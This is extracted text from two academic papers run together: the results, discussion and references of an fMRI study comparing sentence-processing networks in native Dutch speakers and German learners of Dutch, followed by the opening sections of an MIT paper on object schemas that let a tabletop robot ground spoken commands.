left anterior temporal gyrus Right inferior frontal gyrus (opercularis) 402 36 6 30 44 0.000 b 0.000 7.45 Left middle temporal gyrus 464 �60 �46 6 21 0.000b 0.000 7.00 Left fusiform gyrus 849 �42 �52 �16 37 0.000b 0.001 6.66 Left middle occipital gyrus �38 �86 4 19 0.005 6.07 Left lingual gyrus �18 �86 �10 18 0.040 5.37 Left superior occipital gyrus 177 �26 �76 28 19 0.002b 0.002 6.38 Right superior occipital gyrus 829 28 �72 30 19 0.000b 0.003 6.23 Right inferior occipital gyrus 44 �86 0 19 0.007 5.97 Right middle occipital gyrus 34 �90 20 19 0.175 4.82 Right inferior occipital gyrus 40 �62 �10 37 0.323 4.55 Left fusiform gyrus 40 �62 �10 37 0.323 4.55 Left anterior/middle cingulate cortex 119 �10 4 28 24 0.008b 0.039 5.38 Right cerebellum 70 12 �74 �18 0.038 0.054 5.26 Left inferior frontal gyrus (orbitalis) 69 �52 26 �4 47 0.039 0.064 5.20 (4) Left middle temporal gyrus Left anterior middle temporal gyrus 112 �60 �6 �10 21/22 0.006b 0.001 6.77 (5) Left posterior middle temporal gyrus Left inferior parietal cortex 80 �32 �44 30 40 0.023 0.000 7.30 Right middle temporal gyrus 380 40 �68 0 37 0.000b 0.000 6.98 Right middle occipital gyrus 30 �84 8 18 0.211 4.78 Left fusiform gyrus 188 �40 �54 �8 37 0.001b 0.009 5.93 Left hippocampus 62 �30 �38 4 0.043 0.025 5.58 Left middle occipital gyrus 131 �22 �86 2 18 0.004b 0.037 5.44 Left inferior occipital gyrus �40 �76 �2 19 0.219 4.76 Right hippocampus 69 26 �34 8 0.033 0.082 5.15 Left middle occipital gyrus 71 �30 �74 24 19 0.031 0.164 4.88 (6) Left inferior temporal gyrus n.s. Effects are reported at a peak-level threshold of p < 0.0001 uncorrected, pFWE < 0.05 at the cluster level, and all peaks within a cluster >20 mm apart. a Indicates that this peak was taken as a seed for the connectivity analysis. b PPI results that survive a more stringent cluster-level-corrected threshold of pFWE < 0.008 (to control for the six different seeds investigated). BA, Brodman area; FWE, family-wise error; n.s., not significant; PPI, psychophysiological interaction. 349 design. We then looked at the following contrasts: (a) the common patterns of activation for second language users and native speakers for complex sentences versus sentence format consonant strings as revealed by a conjunction be- tween the group contrasts; (b) the differences between the two groups in processing complex sentences versus sentence format consonant strings; (c) the interaction between type of sentence structure and group. The conjunction analysis was performed using SPMs of the minimum T-statistic over two orthogonal contrasts. Inference was based on p-values adjusted for the search volume using the random field theory (Friston et al., 2005). Second-level model connectivity For the second-level connectivity analysis, we built similar models. For each seed region, we built both a sim- ple between-groups t-test and a flexible factorial model. These modeled the same conditions as for the activa- tion analysis, but on the psychophysiological interaction regressors. For the activation as well as the connectivity analyses, we report whole-brain effects at a conservative voxel- level threshold of p < 0.0001, family-wise error (FWE) cor- rected at the cluster level for multiple comparisons ( p < 0.05).1 As we conduct connectivity analyses for six different seed regions, we also report which cluster-level p-values survive a stricter cluster-level threshold of pFWE < 0.008 (Tables 1 and 2). All reported coordinates are in Montreal Neurological Institute space. Results Performance behavioral task Participants were attending to the sentences as evidenced by the performance on the behavioral task. The German na- tive speaker group spotted 85% (standard deviation [SD] = 20%) of target items in larger font size and the Dutch native speaker group 83% (SD = 19%). Activation (a) Conjunction (common pattern of activation across groups): The two-participant groups showed common patterns of activation for complex sentences versus consonant strings across widespread areas of a typical language network (Fig. 2 and Table 1), including left and right middle temporal cortices (on the left from very posterior parts of the temporal cortex close to oc- cipital areas all the way to the anterior temporal pole; on the right in more anterior regions only), left inferior frontal gyrus, as well as left pre/postcentral gyrus, and left and right hippocampus. (b) Main effect of group: There were no differences be- tween the two groups in their activation patterns for complex sentences versus consonant strings. (c) The interaction between type of sentence structure and group: There were no differences in the processing of the two types of sentence structures between the two groups. Connectivity Seed in the left inferior frontal gyrus (a) Conjunction (common pattern of activation across groups): The task-related functional connectivity analysis from the seed in left inferior frontal gyrus showed enhanced connectivity to left occipital cortex Table 2. Activation and Connectivity Effects for the Main Effect of Group Region Cluster size x/y/z BA area pFWE (cluster) pFWE (peak) T45 Activations n.s. (1) PPI from seed in left inferior frontal gyrus Left intraparietal sulcus 226 �32 �44 42 40 <0.001a 0.003 6.3 Left precentral gyrus 93 �22 �4 48 6 0.016 0.022 5.6 Left supramarginal gyrus 93 �56 �24 42 40/3 0.016 0.065 5.22 Left middle occipital gyrus extending into the left intraparietal sulcus 198 �30 �80 30 19 0.001a 0.105 5.03 Left thalamus 63 �6 �2 12 0.045 0.162 4.87 (2–4) PPI from seeds in left temporal pole, left anterior, and middle temporal lobe n.s. (5) PPI from seed in left posterior superior/middle temporal gyrus Left intraparietal sulcus 64 �30 �54 36 40 0.044 0.336 4.55 (6) PPI from seed in left inferior temporal gyrus n.s. In all cases, the second language user group > native speaker group, no significant effects for the reverse contrast. Effects are reported at a peak-level threshold of p < 0.0001 uncorrected, pFWE < 0.05 at the cluster level, and all peaks within a cluster >20 mm apart. a PPI results that survive a more stringent cluster-level-corrected threshold of pFWE < 0.008 (to control for the six different seeds investigated). 1 We used this conservative threshold as the current analysis is a reanalysis of a dataset. However, we want to note that no additional group differences in the activation or connectivity analyses appear at a less conservative voxel-level threshold of p < 0.001, FWE ( p < 0.05) corrected at the cluster level. 350 WEBER ET AL. and left anterior temporal cortex and right inferior frontal cortex for complex sentences compared with consonant strings for both groups, but these effects did not survive the stricter cluster-level threshold of pFWE < 0.008 (Fig. 3 and Table 1). (b) Main effect of group: The second language user group additionally showed enhanced connectivity to left in- ferior parietal regions and the left middle occipital gyrus (Fig. 4 and Table 2), additional group differ- ences in the left precentral gyrus, left supramarginal gyrus, and the left thalamus did not survive the stricter cluster-level threshold of pFWE < 0.008. (c) The interaction between type of sentence structure and group: There were no interaction effects. Seed in the left temporal pole (a) Conjunction (common pattern of activation across groups): The task-related functional connectivity analysis from the seed in the left temporal pole showed enhanced connectivity to the lingual gyrus and the cerebellum for complex sentences compared with consonant strings for both groups. These effects did not survive the stricter cluster-level threshold of pFWE < 0.008 (Table 1). (b) Main effect of group: There were no differences be- tween the groups. (c) The interaction between type of sentence structure and group: There were no interaction effects. Seed in left anterior middle/superior temporal gyrus (a) Conjunction (common pattern of activation across groups): The task-related functional connectivity anal- ysis from the seed in the left anterior temporal lobe showed enhanced connectivity to regions of the lan- guage network from inferior frontal gyrus to posterior temporal cortex as well as occipital cortex gyrus for complex sentences compared with consonant strings for both groups. Most of these connectivity effects sur- vived the stricter threshold (Table 1 and Fig. 3). (b) Main effect of group: There were no differences be- tween the groups. (c) The interaction between type of sentence structure and group: There were no interaction effects. Seed in left middle/superior temporal gyrus (a) Conjunction (common pattern of activation across groups): The seed in left middle temporal gyrus was coupled to a slightly more anterior left middle temporal region for sentences compared with sentence format consonant strings for both groups (Table 1 and Fig. 3). (b) Main effect of group: There were no differences be- tween the groups. (c) The interaction between type of sentence structure and group: There were no interaction effects. Seed in left posterior middle/superior temporal gyrus (a) Conjunction (common pattern of activation across groups): Enhanced connectivity to sentences com- pared with consonant strings from a seed in left poste- rior temporal gyrus was found in the left angular gyrus, right inferior temporal gyrus, and the left fusi- form for both groups. Additional effects in the occip- ital gyrus and bilateral hippocampi did not survive the stricter cluster-level threshold of pFWE < 0.008. FIG. 2. Conjunction of patterns of activation across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < 0.0001 uncorrected, cluster-level threshold pFWE < 0.05 (Table 1 shows which of these psychophys- iological interaction [PPI] effects survive a more stringent pFWE < 0.008 cluster-level threshold to correct for number of seeds investigated). Bar graphs of contrast values with 95% confidence intervals of representative peaks are provided for illustra- tion purposes. FWE, family-wise error. Color images available online at www.liebertpub.com/brain BRAIN NETWORKS IN SECOND LANGUAGE USERS 351 FIG. 3. Shared patterns of task-related connectivity across the two groups: Conjunction of psychophysiological interactions from seeds in LIFG, LATG, LMTG, and LPTG (seeds shown in blue), defined based on peaks in the activation analysis, see Fig- ure 2 across the two groups for the contrast of sentences versus consonant strings, voxel-level threshold p < 0.0001 uncorrected, and cluster-level threshold pFWE < 0.05 (Table 1 shows which of these PPI effects survive a more stringent pFWE < 0.008 cluster-level threshold to correct for number of seeds investigated). Bar graphs of contrast values with 95% confidence intervals of represen- tative peaks are provided for illustration purposes. LATG, left anterior temporal gyrus; LMTG, left middle temporal gyrus; LIFG, left inferior frontal gyrus; LPTG, left posterior temporal gyrus. Color images available online at www.liebertpub.com/brain FIG. 4. Main effect of group (German native speaker group > Dutch native speaker group) of the psychophysiological interactions from seeds in LIFG and LPTG (shown in blue) for the contrast of sentences versus consonant strings, voxel-level threshold p < 0.0001 uncorrected, and cluster-level threshold pFWE < 0.05 (Table 1 shows which of these PPI effects survive a more stringent pFWE < 0.008 cluster-level threshold to correct for number of seeds investigated). Bar graphs of contrast values with 95% confidence in- tervals of representative peaks are provided for illustration purposes. Color images available online at www.liebertpub.com/brain 352 (b) Main effect of group: The second language user group additionally showed enhanced connectivity to a left inferior parietal region, which did not survive the stricter threshold of pFWE < 0.008 (Fig. 4 and Table 2). (c) The interaction between type of sentence structure and group: There were no interaction effects. Seed in left inferior temporal gyrus. There were no signif- icant connectivity effects for this seed. Discussion Summary of the results In this study, we investigated the processing of complex Dutch sentences in an activation and connectivity fMRI study. We compared the brain networks of a group of Dutch native speakers and a group of German native speak- ers with Dutch as their second language during sentence pro- cessing. The experiments revealed the following: (1) Activation and connectivity patterns to process com- plex sentences overlapped between native speakers and second language users, as revealed by conjunction analyses. (2) The second language user group showed some addi- tional connectivity patterns, involving areas outside the traditional language network, that is, inferior pari- etal regions. Connectivity and activation in the language network The current study revealed a large network of regions sim- ilar to those shown before for native (den Ouden et al., 2012; Griffiths et al., 2013; Snijders et al., 2009, 2010) and second language processing (Weber and Indefrey, 2009) for similar manipulations for simpler sentences. As expected, the core of these networks resides in the left middle temporal and infe- rior frontal cortex. In the context of sentence-level processing, these are thought to be linked to key language processing functions, namely the access to the relevant building blocks such as words, from memory and the unification of these into a coherent message-level representation both on the se- mantic and syntactic levels, respectively (Hagoort, 2005, 2014; Tyler et al., 2011). Not surprisingly, these areas also show enhanced connectivity during sentence processing as they have to work in consort during online processing. Anatomically, these frontal and temporal areas of the lan- guage network are connected by several fiber bundles, such as the arcuate fasciculus, connecting the inferior frontal cor- tex with parts of the posterior temporal cortex, and the unci- nate, connecting frontal cortex and anterior temporal cortex (Friederici and Gierhan, 2013; Hagoort, 2014). In addition to the key network on the left, we found additional activa- tions in the right temporal gyrus. While not typically in- volved, for example, in syntactic processing (Segaert et al., 2012), one should keep in mind that in this study we are in- vestigating a broad contrast of (complex) sentences versus sentence format consonant strings, which thus incorporates all kinds of levels of language processing (sentence and word-level syntax and semantics, lexical processing, and control processes), which do engage these areas (Hagoort, 2014). The involvement of a large network of areas, includ- ing those outside of left inferior frontal and temporal gyrus, is thus not surprising. Both for the activation and the connectivity analyses, the vast overlap between these language networks for second language users and native speakers is evident. Thus, even for highly complex and even previously unknown sentence structures, the main processing network for a second lan- guage seems to be shared with that of a native language at least at the high-proficiency level of the present L2 user group. This also supports the electrophysiological findings by Davidson and Indefrey (2009), which showed that these structures can be learned quickly. This also mirrors previous findings in the literature for simpler sentence structures (Indefrey, 2006; Luke et al., 2002; Perani et al., 1998; Weber and Indefrey, 2009) and provides evidence against ideas that a second language is processed by a fundamentally different brain network. Less automatic processing in second language users Several areas showed increased connectivity patterns in the second language user group for processing complex sentence structures compared with the native speakers. This suggests that some additional or different mechanisms are at play to process complex sentences in a non-native language. The in- crease in connectivity in this group from left inferior frontal gyrus and less strongly from left posterior temporal gyrus to inferior parietal regions could potentially stem from increased cognitive demands on the multidemand and control system (Duncan, 2010; Humphreys and Lambon Ralph, 2015) when processing a second language. The observation that pro- cessing a second language, even at a high-proficiency level, could lead to increased demands on cognitive control mech- anisms has been claimed before (Abutalebi et al., 2008; Green and Abutalebi, 2013). This suggests that there are no differ- ences in the organization of the core language machinery itself, which appears to be shared between a first and a sec- ond language just as previous research suggests (Weber and Indefrey, 2009). The differences arise in the increased demands on systems that act on the core language processing system to ensure that the task demands (efficiently parsing the sentence and get- ting to a coherent message level representation) are met. These cognitive demands increase when processing a second lan- guage and the result is an increase in connectivity in the fron- toparietal network related to top-down cognitive control and attention, as well as executive semantic decisions (Humphreys and Lambon Ralph, 2015). Specifically, the connectivity dif- ferences seem to be involving the left intraparietal sulcus part close to the angular gyrus, which a recent meta-analysis in which high- versus low-demand semantic tasks were con- trasted had also found (Noonan et al., 2013) and linked to domain-general executive control demands. Generally, our findings seem to indicate that the core lan- guage machinery is shared between native and second lan- guage user groups, even when processing highly complex structures that do not exist in the L2 users’ native language. With an increase in cognitive control, these areas can handle second language structures as effectively as an L1 group. The differences in brain networks are thus only in peripheral areas related to cognitive control, which are influencing the core network. We thus find no evidence for a fundamental BRAIN NETWORKS IN SECOND LANGUAGE USERS 353 distinction between first and second language processing, as in more procedural versus declarative processing as claimed by Ullman (2001a,b) or a specific difference in grammatical processing of nonlocal dependencies in a second language (Clahsen and Felser, 2006). No specific group differences for later learned structures Next to investigating general differences between lan- guage processing in native speakers and second language users, we wanted to see whether there are any specific pro- cessing differences related to later learned structures that cannot be easily mapped on an existing structure from the na- tive language. At the current conservative statistical thresh- olds, we do not see any such differences indicating that later learned sentence structure can also be integrated into existing language networks in the brain. There is thus no con- crete evidence with this analysis for different language mechanisms in processing these later learned sentence struc- tures. However, subtle difference in organization within these overlapping language networks that were indicated by the repetition effects analysis of the same dataset (see Weber’s (2012) PhD thesis) should be further investigated in future studies. Furthermore, future investigations should see whether the current results hold under different task con- ditions, for example, when sentence comprehension ques- tions are asked, as well as for other, less closely related language combinations. Conclusion In sum, while cortical language networks, involving left inferior frontal and left middle temporal regions, largely overlapped between second language users and native speak- ers, nontraditional language areas in inferior parietal regions show connectivity differences, hinting at less automatic pro- cessing of an L2, thus requiring more cognitive control. Acknowledgments This research was supported by an NWO Toptalent (Grant No. 021.001.007) to K.W. The authors would like to thank Monique Flecken for helpful feedback on the manuscript. Author Disclosure Statement No competing financial interests exist. References Abutalebi J, Annoni JM, Zimine I, Pegna AJ, Seghier ML, Lee- Jahnke H, Lazeyras F, Cappa SF, Khateb A. 2008. Language control and lexical competition in bilinguals: an event-related FMRI study. Cereb Cortex 18:1496–1505. Bach E, Brown C, Marslen-wilson W. 1986. Crossed and nested dependencies in German and Dutch: a psycholinguistic study. Lang Cogn Process 1:249–262. Clahsen H, Felser C. 2006. How native-like is non-native lan- guage processing? Trends Cogn Sci 10:564–570. Consonni M, Cafiero R, Marin D, Tettamanti M, Iadanza A, Fab- bro F, Perani D. 2013. Neural convergence for language com- prehension and grammatical class production in highly proficient bilinguals is independent of age of acquisition. Cortex 49:1252–1258. Dallas A, Kaan E. 2008. Second language processing of filler- gap dependencies by late learners. Lang Linguist Compass 2:372–388. Davidson DJ, Indefrey P. 2009. Plasticity of grammatical recur- sion in German learners of Dutch. Lang Cogn Process 24:1335–1369. den Ouden D-B, Saur D, Mader W, Schelter B, Lukic S, Wali E, Timmer J, Thompson CK. 2012. Network modulation during complex syntactic processing. Neuroimage 59:815–823. Duncan J. 2010. The multiple-demand ( MD) system of the pri- mate brain: mental programs for intelligent behaviour. Trends Cogn Sci 14:172–179. Friederici AD, Gierhan SME. 2013. The language network. Curr Opin Neurobiol 23:250–254. Friston KJ, Penny WD, Glaser DE. 2005. Conjunction revisited. Neuroimage 25:661–667. Green DW, Abutalebi J. 2013. Language control in bilinguals: the adaptive control hypothesis. J Cogn Psychol (Hove) 25:515–530. Griffiths JD, Marslen-Wilson WD, Stamatakis EA, Tyler LK. 2013. Functional organization of the neural language system: dorsal and ventral pathways are critical for syntax. Cereb Cortex 23:139–147. Grodzinsky Y, Friederici AD. 2006. Neuroimaging of syntax and syntactic processing. Curr Opin Neurobiol 16:240–246. Hagoort P. 2005. On Broca, brain, and binding: a new frame- work. Trends Cogn Sci 9:416–423. Hagoort P. 2014. Nodes and networks in the neural architecture for language: Broca’s region and beyond. Curr Opin Neuro- biol 28:136–141. Hagoort P, Indefrey P. 2014. The neurobiology of language be- yond single words. Annu Rev Neurosci 37:347–362. Hartsuiker RJ, Pickering MJ, Veltkamp E. 2004. Is syntax separate or shared between languages?: cross-linguistic syntactic prim- ing in Spanish-English bilinguals. Psychol Sci 15:409–414. Humphreys GF, Lambon Ralph MA. 2015. Fusion and fission of cognitive functions in the human parietal cortex. Cereb Cor- tex 25:3547–3560. Indefrey P. 2006. A meta-analysis of hemodynamic studies on first and second language processing: which suggested differ- ences can we trust and what do they mean? Lang Learn 56:279–304. Kaan E, Vasić N. 2004. Cross-serial dependencies in Dutch: test- ing the influence of NP type on processing load. Mem Cognit 32:175–184. Luke K-K, Liu H-L, Wai Y-Y, Wan Y-L, Tan LH. 2002. Func- tional anatomy of syntactic and semantic processing in lan- guage comprehension. Hum Brain Mapp 16:133–145. McLaren DG, Ries ML, Xu G, Johnson SC. 2012. A generalized form of context-dependent psychophysiological interactions (gPPI): a comparison to standard approaches. Neuroimage 61:1277–1286. Menenti L, Gierhan SM, Segaert K, Hagoort P. 2011. Shared language: overlap and segregation of the neuronal infrastruc- ture for speaking and listening revealed by functional MRI. Psychol Sci 22:1173–1182. Nieuwland MS, Van Berkum JJA. 2006. Individual differences and contextual bias in pronoun resolution: Evidence from ERPs. Brain Res 1118:155–167. Noonan KA, Jefferies E, Visser M, Lambon Ralph MA. 2013. Going beyond inferior prefrontal involvement in semantic control: evidence for the additional contribution of dorsal an- gular gyrus and posterior middle temporal cortex. J Cogn Neurosci 25:1824–1850. 354 WEBER ET AL. Nowak MA, Komarova NL, Niyogi P. 2002. Computational and evolutionary aspects of language. Nature 417:611–617. Perani D, Paulesu E, Galles NS, Dupoux E, Dehaene S, Betti- nardi V, Cappa SF, Fazio F, Mehler J. 1998. The bilingual brain. Proficiency and age of acquisition of the second lan- guage. Brain 121:1841–1852. Schoonbaert S, Hartsuiker RJ, Pickering MJ. 2007. The repre- sentation of lexical and syntactic information in bilinguals: evidence from syntactic priming. J Mem Lang 56:153–171. Sebastian R, Laird A, Kiran S. 2011. Meta-analysis of the neural representation of first language and second language. Appl Psycholinguist 32:799–819. Segaert K, Menenti L, Weber K, Petersson KM, Hagoort P. 2012. Shared syntax in language production and language comprehension—an FMRI study. Cereb Cortex 22:1662– 1670. Snijders TM, Petersson KM, Hagoort P. 2010. Effective connec- tivity of cortical and subcortical regions during unification of sentence structure. Neuroimage 52:1633–1644. Snijders TM, Vosse T, Kempen G, Van Berkum JJA, Petersson KM, Hagoort P. 2009. Retrieval and unification of syntactic structure in sentence comprehension: an fMRI study using word-category ambiguity. Cereb Cortex 19:1493–1503. Stromswold K, Caplan D, Alpert N, Rauch S. 1996. Localization of syntactic comprehension by positron emission tomogra- phy. Brain Lang 52:452–473. Tyler LK, Marslen-Wilson WD, Randall B, Wright P, Dever- eux BJ, Zhuang J, Papoutsi M, Stamatakis EA. 2011. Left inferior frontal cortex and syntax: function, structure and behaviour in patients with left hemisphere damage. Brain 134:415–431. Uddén J, Ingvar M, Hagoort P, Petersson KM. 2012. Implicit ac- quisition of grammars with crossed and nested non-adjacent dependencies: investigating the push-down stack model. Cogn Sci 36:1078–1101. Ullman MT. 2001a. The neural basis of lexicon and grammar in first and second language: the declarative/procedural model. Bilingualism Lang Cogn 4:105–122. Ullman MT. 2001b. A neurocognitive perspective on language: the declarative/procedural model. Nat Rev Neurosci 2:717–726. Ullman MT. 2006. Is Broca’s area part of a basal ganglia thala- mocortical circuit? Cortex 42:480–485. Weber K. 2012. The language learning brain: evidence from sec- ond language learning and bilingual studies of syntactic pro- cessing. PhD, Radboud University, Nijmegen. Weber K, Indefrey P. 2009. Syntactic priming in German–En- glish bilinguals during sentence comprehension. Neuroimage 46:1164–1172. Zwart J-W. 1996. Verb clusters in Continental West Germanic dialects. In: Black JR, Motapanyane V (eds.) Microparamet- ric Syntax and Dialect Variation. Amsterdam/Philadelphia, PA: John Benjamins Publishing Company; pp. 229–258. Address correspondence to: Kirsten Weber Max Planck Institute for Psycholinguistics P.O. Box 310 6500 AH Nijmegen The Netherlands E-mail: kirsten.weber@mpi.nl BRAIN NETWORKS IN SECOND LANGUAGE USERS 355 work_lrdgtltc5rauvhtborqncq7uou ---- Word template for authors, EIAS Style B Object schemas for grounding language in a responsive robot K a i - yu h Hsi ao a * , S te f an i e T el le x a , S o ro u sh V o sou g hi a , R o n y K ub a t a , D e b Ro y a aMIT Media Laboratory, MIT, Cambridge, Massachusetts, USA Abstract We introduce an approach for physically-grounded natural language interpretation by robots which reacts appropriately to unanticipated physical changes in the environment and dynamically assimilates new information pertinent to ongoing tasks. At the core of the approach is a model of object schemas that enables a robot to encode beliefs about physical objects in its environment using collections of coupled processes responsible for sensorimotor interaction. These interaction processes run concurrently in order to ensure responsiveness to the environment, while coordinating sensorimotor expectations, action planning, and language use. The model has been implemented on a robot that manipulates objects on a tabletop in response to verbal input. The implementation responds to verbal requests such as “Group the green block and the red apple,” while adapting in real-time to unexpected physical collisions and taking opportunistic advantage of any new information it may receive through perceptual and linguistic channels. Keywords: object schema; language grounding; human-robot interaction; semantics _____________________ *Corresponding author. aEmails: {eepness, stefie10, soroush, kubat, dkroy}@media.mit.edu mailto:soroush@media.mit.edu mailto:kubat@media.mit.edu Object-centred, behaviour-based language grounding Natural language is an efficient means by which humans convey beliefs and desires to other people. Analogously, a robot system that uses natural language could communicate more efficiently with humans. The conceptual structures required for language use could also help the robot interact with an environment generally designed by humans for human use. For a robot with a physical body to make sense of language, the robot's internal representations need to be grounded in the real world, meaning that the robot must have processes that relate its words and concepts to its perceptions and actions in systematic ways. For instance, a language-using robot must identify the perceptual referents of nouns, and it must translate verbs into appropriate motor behaviour. A physical robot, however, also needs to stay responsive to changes in its environment. This is the premise of behaviour-based robot design, as argued by Brooks [8] and numerous others. In this paper we present a model for language grounding that addresses the need for responsiveness without sacrificing the ability to form structured internal representations of a kind necessary to support symbolic communication. At the core of the model are object schemas, in which running processes are organized according to the physical object towards which they are directed, and by which they are causally affected. The object schema processes run concurrently to ensure responsiveness of the robot to its environment. The object schemas built from the processes provide object representations for planning and language use. The model builds upon an underlying theoretical object schema framework developed in [32, 33]. To demonstrate the efficacy of these constructs, we have implemented a robotic system in which the object schemas assist the coordination of vision, touch, motor action, planning, and language use, in a tabletop domain. Figure 1 shows the robot, Trisk, performing a behaviour sequence enabled by the model. In this paper we first situate our approach with respect to related work in the field. Then, we explain the model and describe selected aspects of the implementation in greater detail. Background Our model brings together behaviour-based design and language grounding, combined through a sensorimotor schema representation of objects. In this section we review some related work and highlight some benefits of our model. SMPA and nonlinguistic behaviourbased robots From the days of Shakey (the first language-using robot [28]) the “traditional” approach for robot planning and control was what Brooks eventually called the “sense-model-plan-act” approach (SMPA). The idea behind SMPA is that sensory input is interpreted as a model of the external world, the model is used for planning purposes, and then the plans are used to guide action. The SMPA model naturally supports language use. For example, verbal commands can be translated into plans that are inserted into the plan layer of an SMPA system. Likewise, verbal descriptions of world state can be translated into elements of the model layer. As an alternative to the SMPA approach, Brooks [7, 8] developed the subsumption architecture, an early example of behaviour-based robot control. Behaviour-based approaches focus first and foremost on the responsiveness of the robot to unexpected (and thus unmodelled) changes in the environment. The subsumption architecture maintains responsiveness by decomposing a task into separate behaviours and having a dedicated process handle all aspects of each specific behaviour, from sensory input to motor output. Behaviour processes interact through layered control interrupts. Brooks identified the use of internal models of the environment as the primary culprit for impeding responsiveness to change, and as a result, argued against explicit internal models altogether. This prohibition, however, leaves no clear path for language processing, which is fundamentally a “representation-hungry” task [14]. Later work on behaviour-based robots have introduced some degree of representation and planning by layering these elements on top of reactive processes. For instance, some of the three-layer systems developed to date [10, 11, 19, 20] allow reactive behaviours (such as collision-avoidance) to compete with more complex planned behaviours (such as mapping and path planning) as part of an action selection process. Representations in such systems focus primarily on behaviours and task decomposition. Object representation Behaviour-based robots have been successfully deployed in a number of real world systems, demonstrating how much can be accomplished with a minimum of representation. However, the raw sensorimotor processing of the subsumption architecture and the action representations of the later systems have limitations with respect to human communication and acting in human-centric environments. Adding representations of physical objects is important for several reasons: Communicating about objects Human language use is full of statements about objects, suggesting that explicitly representing objects will enable the robot to efficiently handle such language. Planning actions Representing objects would allow a robot to plan coherent sequences of actions towards goals expressed in terms of objects and their states. Coordinating expectations The conception of objects and object permanence may provide an efficient means for a robot to generate structured predictions of incoming sensory input, and to predict changes in the environment as a result of specific actions taken by the robot. Because of the importance of objects in communication and planning, our object schema model organizes processes according to the object they target. There are several other systems that explicitly represent physical objects. Here we relate them to our approach: Object persistence and tracking Several projects inspired by behaviour-based design, such as those led by Blumberg et al. [12, 24] and later Breazeal et al. [5, 6] remain reactive while updating object representations continuously. However, in these models much of the object processing is decoupled from the object representations themselves, making it inconvenient to represent object-directed affordances (i.e., actions that can be taken and states that can be achieved by the agent, due to the object [21]) such as “liftable” and “graspable.” Because the processes that target an object are contained within our object schemas, affordance information can be stored alongside the corresponding processes in our object representation. This simplifies the grounding of affordance-related words. Affordance learning Several systems do represent object affordances explicitly, for instance for learning affordances [17, 18, 27, 39]. Learning is a vital future direction for our work as well, but our current emphasis is on developing a richer affordance-centred representation of objects that can support language use and responsive behaviour. The model that is presented in this paper is influenced by the Piagetian idea of a sensorimotor schema [29]. Both Arbib [1] and Drescher [16] have developed computational interpretations of Piaget's concept of schemas. Drescher's schema mechanism is an early attempt to fully implement schemas and test them in a simulated world. Drescher strived for a learning system that minimized “innate” structures, preferring a highly data-driven learning system that constructed primitive object schemas out of very low level sensorimotor primitives. In practice the implementations based on this approach failed to scale to environments beyond extremely simple grid-worlds. In contrast, our approach provides fairly rich built-in structures in the form of robotic controllers and perceptual processing routines with the goal of implementing more capable systems that demonstrate robust real world object-directed behaviour. Drescher's work suggests future directions for introducing structure learning capabilities into our approach by “deconstructing” our innate schema structures and enabling the system to reconstruct schemas based on experience. Under the schema view, objects are a useful abstraction that brings structure to otherwise incoherent and overwhelming sensorimotor experience. A system with no object representation would have to explicitly encode an enormous network of sensorimotor expectations just to gain basic abilities like object persistence, while a system with an object representation can expect that a green object will continue to appear green. Object schemas thus enable the system to organize perceptions and actions in ways that matter to the system's programmed goals. Our model provides a computational/mechanistic interpretation of the schema concept with sufficient detail to implement on a physical robot. Reactive grounded language robots Several mobile robot systems include the ability to take verbal commands [3, 25, 26, 27]. Some of these robots can also run collision-avoidance behaviours in competition with verbally-commanded behaviours, using a mechanism like those in a subsumption-based system. In essence, such systems use SMPA-based language grounding grafted atop a behaviour-based reactive robot, granting the benefits of both a full representation and behaviour-based responsiveness. Figure 2 shows a depiction of this model. However, our object schema approach is specifically not adding SMPA to a reactive robot. Rather than temporally interspersing responsive behaviours with language use and planning, our approach constructs object representations for language use and planning using the responsive behaviours, so a sensorimotor event can rapidly alter linguistic and planning structures and processes. A collision with an object not only causes our robot to pull back to avoid damage, but the process handling the collision also provides updated knowledge of the object's expected location, altering the target location for subsequent verbally-commanded grasping actions. In contrast, the reactive SMPA approach would use separate processes for collision- handling and for building a model from sensory input to locate objects for verbal command processing. Our object schemas are thus more adept at leveraging information from the reactive level. A high-level overview of our approach is depicted in Figure 3 to contrast with the preceding SMPA diagram. Other grounded language systems Numerous previous efforts have addressed language grounding either in physical or virtual worlds (see [31] for a survey of models of word grounding, and a collection of recent papers on the topic introduced in [35]). Winograd's SHRDLU [41] carried out natural language commands in a symbolic “simulator” of a blocks-world manipulation robot. While Winograd abstracted away many of the core issues we focus on here related to interacting with and representing real objects, SHRDLU's linguistic performance remains impressive to this day. Many other language-grounding systems such as [2, 30, 36] connect aspects of language use or word meaning to perceptual features grounded in objects, but do not address the underlying problem of how a machine might conceive of objects in the first place. Several other researchers pairing language and robotics [13, 38, 40] focus on evolving novel languages between agents or robots trying to communicate. Our focus is on representations specifically appropriate to pre-existing human languages that can be used in human-robot interaction tasks. In our previous work we developed a robot called Ripley that is able to respond to spoken commands such as “Hand me the blue one on your left” [23, 34]. Ripley was not, however, responsive to changes or corrections, and action failures had no impact on decision-making beyond a simple retry mechanism. In contrast, our new approach uses a planning mechanism to make decisions, respond to sudden changes, and replan dynamically. Interaction processes and the object schema model As described in the “Reactive grounded language robots” section above, an SMPA model built on top of a reactive robot system could carry out verbal tasks, but its reactive processes would function independently of the verbal processing. In contrast, our object schema model coordinates language use, planning, and sensorimotor expectations by using object representations built out of the reactive processes. We call these processes interaction processes (in this context we sometimes just call them “processes” for brevity), and they form the basic building block of the model. The interaction processes are simultaneously organized into object schemas, which represent objects, and plan hierarchies, which coordinate action planning. For language purposes, the object schemas and plan hierarchies both serve as representations that language can be grounded to. For example, noun phrases can connect to the object schemas, and verb phrases in commands can connect to the plan hierarchies. In this section we describe the model in greater detail. Interaction processes and histories The fundamental building block of the model is the interaction process. Interaction processes perform tasks such as taking sensory input, producing motor output, and manipulating internal records. The interaction processes run concurrently and continuously, thus ensuring responsiveness. Each interaction process provides information to other processes by writing data to shared memory. By building object schemas and plan hierarchies out of interaction processes, information in the shared memory is coordinated between the sensorimotor modalities, planning, and language use. Interaction processes have a main loop that can be started and stopped, and some processes exit when their main loops complete their programmed tasks. These tasks could include finding interesting visual regions or reaching the robot arm towards an object. Figure 4 shows a visual notation for four interaction processes with various run states (represented by the left-side semicircle) and various finish states (represented by the right-side semicircle). Interaction histories The data that each interaction process writes to shared memory is called its interaction history. The interaction histories allow processes to provide information to each other. This use of shared memory somewhat resembles a traditional blackboard model, except that each process can only write to its dedicated space. There are two primary types of history data: attribute data, which is returned while a process is running, and completion data, which is returned when a process' loop is completed (e.g., finishing an attempt to touch an object). Attribute data contains information to be incorporated into knowledge of the attributes of an object (such as colour, shape, and location). The attributes of an object can be continuous (e.g., colour and weight as measured from sensory input) or discrete (e.g., a labelled 